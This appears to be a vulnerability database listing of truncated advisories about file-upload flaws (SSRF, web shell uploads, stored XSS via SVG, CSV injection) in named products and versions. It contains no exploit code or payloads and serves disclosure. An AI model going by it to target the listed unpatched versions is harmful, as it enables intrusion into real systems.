EUVD-2026-8467

Payload is a free and open source headless content management system. Prior to 3.75.0, a Server-Side Request Forgery SSRF vulnerability exists in Payload's external file upload functionality. When processing external URLs for file uploads, insufficient validation of HTTP redirects could allow an...

PT-2025-52717

Name of the Vulnerable Software and Affected Versions ProjectSend version r1605 Description ProjectSend r1605 contains a remote code execution issue that allows attackers to upload malicious files by manipulating file extensions. Attackers can upload shell scripts with disguised extensions throug...

PT-2025-5744 · Ckan · Ckan

Name of the Vulnerable Software and Affected Versions: CKAN versions prior to 2.10.7 and 2.11.2 Description: CKAN is an open-source data management system for powering data hubs and data portals. A user could potentially upload a file containing code that, when executed, could send arbitrary...

PT-2025-5229 · Innovative Solutions · Innovative Solutions User Files

Name of the Vulnerable Software and Affected Versions: Innovative Solutions user files versions n/a through 2.4.2 Description: The issue allows an unrestricted upload of files with dangerous types, enabling the upload of a web shell to a web server. This can potentially allow attackers to upload...

PT-2025-2880 · Adportal · Adportal

Name of the Vulnerable Software and Affected Versions: AdPortal version 3.0.39 Description: A remote attacker can execute arbitrary code via the file upload functionality due to a File Upload Bypass issue. This allows attackers to bypass file upload checks and run arbitrary code. Recommendations:...

PT-2024-17661 · WordPress · Svg Shortcode

Name of the Vulnerable Software and Affected Versions: SVG Shortcode plugin for WordPress versions up to, and including, 1.0.1 Description: The issue is related to Stored Cross-Site Scripting via SVG File uploads due to insufficient input sanitization and output escaping. This allows...

PT-2024-20701 · Ibm · Ibm Cognos Controller

Name of the Vulnerable Software and Affected Versions: IBM Cognos Controller versions 11.0.0 through 11.0.1 Description: The issue concerns a malicious file upload vulnerability due to the lack of validation of the type of file uploaded to Journal entry attachments. Attackers can exploit this...

PT-2024-35775 · Taiga · Taiga

Name of the Vulnerable Software and Affected Versions: Taiga version 6.8.1 Description: A CSV injection issue allows attackers to execute arbitrary code via uploading a crafted CSV file. This is achieved by loading a specifically manipulated CSV file, enabling the execution of arbitrary code...

PT-2024-34158 · Unknown · Instantcms

Name of the Vulnerable Software and Affected Versions: InstantCMS versions prior to 2.16.3 Description: The issue is related to a lack of input validation in the photo upload function on the photo album page, allowing attackers to inject and execute Cross Site Scripting XSS payloads...

PT-2024-16265 · Sourcecodester · Sourcecodester Attendance/Payroll System

Name of the Vulnerable Software and Affected Versions: SourceCodester Attendance and Payroll System version 1.0 Description: A critical issue has been found in the upload function of the file /marimar/guest/update.php, allowing unrestricted upload through the manipulation of the image argument...

PT-2024-33566 · Unknown · Paxman Product Website Showcase

Name of the Vulnerable Software and Affected Versions: Paxman Product Website Showcase versions n/a through 1.0 Description: The issue allows an unrestricted upload of files with dangerous types, enabling the upload of a web shell to a web server. This can potentially allow attackers to deploy...

PT-2024-39321 · WordPress · Fonto

Name of the Vulnerable Software and Affected Versions: Fonto – Custom Web Fonts Manager plugin for WordPress versions up to, and including, 1.2.1 Description: The issue is related to Stored Cross-Site Scripting via SVG File uploads due to insufficient input sanitization and output escaping. This...

PT-2024-7096 · Adobe · Indesign Desktop

Name of the Vulnerable Software and Affected Versions: InDesign Desktop versions 19.4, 18.5.3 and earlier Description: The issue is related to an Unrestricted Upload of File with Dangerous Type, which could result in arbitrary code execution. An attacker could exploit this by uploading a maliciou...

PT-2024-27797 · Unknown · Itsourcode Online Discussion Forum Project

Name of the Vulnerable Software and Affected Versions: Itsourcecode Online Discussion Forum Project version 1.0 Description: The issue allows a remote attacker to execute arbitrary code via the "poster.php" file. The uploaded file is received using the $ FILES variable. This enables the attacker ...

PT-2024-32396 · Django +1 · Django +1

Name of the Vulnerable Software and Affected Versions: Strawberry GraphQL versions prior to 0.243.0 Description: The issue concerns Strawberry GraphQL, a library for creating GraphQL APIs. Prior to version 0.243.0, multipart file upload support was enabled by default in all Strawberry HTTP view...

PT-2024-18158 · WordPress · Ninja Forms - File Uploads

Name of the Vulnerable Software and Affected Versions: Ninja Forms - File Uploads plugin for WordPress versions up to, and including, 3.3.16 Description: The issue is a Stored Cross-Site Scripting vulnerability via an uploaded file, such as an RTX file, due to insufficient input sanitization and...

PT-2024-5487 · Admidio · Admidio

Name of the Vulnerable Software and Affected Versions: Admidio versions prior to 4.3.10 Description: A Remote Code Execution issue exists in the Message module of the Admidio Application. This is due to the lack of file extension verification, allowing malicious files to be uploaded to the server...

PT-2024-27653 · Zealousweb · Zealousweb Generate Pdf Using Contact Form 7

Name of the Vulnerable Software and Affected Versions: ZealousWeb Generate PDF using Contact Form 7 versions 4.0.6 and earlier Description: The issue is related to an Unrestricted Upload of File with Dangerous Type, which affects ZealousWeb Generate PDF using Contact Form 7. Recommendations: For...

PT-2024-22859 · Unknown · Volmarg Personal Management System

Name of the Vulnerable Software and Affected Versions: Volmarg Personal Management System version 1.4.64 Description: The Volmarg Personal Management System is vulnerable to Server Side Request Forgery SSRF via uploading a SVG file. This allows the server to make unintended HTTP and DNS requests ...

PT-2024-4177 · Adobe · Commerce

Name of the Vulnerable Software and Affected Versions: Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier Description: The issue is related to an Unrestricted Upload of File with Dangerous Type, which could result in arbitrary code execution. A high-privilege attacker could...